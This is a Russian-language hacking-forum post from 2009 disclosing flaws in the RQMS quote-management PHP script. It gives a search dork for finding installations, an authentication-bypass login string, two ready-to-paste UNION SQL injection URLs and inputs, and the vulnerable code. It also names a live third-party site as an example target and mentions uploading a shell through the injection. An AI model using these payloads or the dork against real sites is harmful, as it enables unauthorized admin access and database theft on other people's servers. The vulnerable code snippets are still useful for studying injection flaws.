HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Уязвимости RQMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости RQMS
  #1  
Старый 04.01.2009, 18:13
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию Уязвимости RQMS
Уязвимости RQMS
RQMS - Rash Quote Management System

Достаточно популяный движок цитатника. Главная слабость - обход авторизации при админке (
URL: http://rqms.sourceforge.net
Version: <=1.2.2
Founded by: Dimi4
Dork:: "Rash Version: 1.2.1"

Обход авторизации
Need: magic_quotes_gpc = OFF

Код:
http://127.0.0.1/rash-v1.2.2/?admin
Вместо логина вводим:
Код:
' OR 1=1/*
Уязвимый код:

PHP код:
    case 'adminlogin':
        include('config.php');
        $sql "SELECT * FROM `" $rashusers "` WHERE `user` ='" $_POST['user'] . "' AND `password` ='" md5($_POST['password']) . "'";
        while($row mysql_fetch_array(database_connect($sql))){
            $section='0';
            //setting cookies
            adminpanel();  //    (template)_admin.php in templates folder by default
            exit();
        } 
Пример:http://nocude.maisum.net/?admin

Sql-inj
Need: magic_quotes_gpc = OFF, admin user

Код:
http://127.0.0.1/rash-v1.2.2/?news_edit&id=4'+union+select+1,concat_ws(0x3a,version(),user(),database()),3/*
Можно заюзать для заливки шелла(если file_priv = Y)
Уязвимый код:
(function content(), index.php)
PHP код:
include('config.php');
                $nID $_GET['id'];
                $sql "SELECT * FROM `" $newstable "` WHERE `id` = '" $nID "'";
                news_change($sql); // output.php 
Sql-inj in Search
Need: magic_quotes_gpc = OFF,

Идем в http://127.0.0.1/VULN/rash-v1.2.2/?search
Вместо фразы тыкаем:
Код:
' union select database(),version(),user(),4,5,6/*
Уязвимый код:


PHP код:
$quote $_POST['search'];
        $sortby $_POST['sortby'];
        $number $_POST['number'];
        if($sortby == 'rating'){
            $how 'desc';
        }
        if($sortby == 'id'){
            $how 'asc';
        }
        $sql "SELECT * FROM `" $quotetable "` WHERE `quote` LIKE '%" $quote "%' ORDER BY `" $sortby "` " $how " LIMIT " $number;
        quote_format($sql0);        // output.php 
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Dimi4; 04.01.2009 в 18:17..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости. Обсуждения. 9 15.08.2009 15:08
В Windows Mobile найдено две уязвимости ground_zero Мировые новости. Обсуждения. 1 06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Современные информационные угрозы, четвертый квартал 2005 dinar_007 Мировые новости. Обсуждения. 3 28.01.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...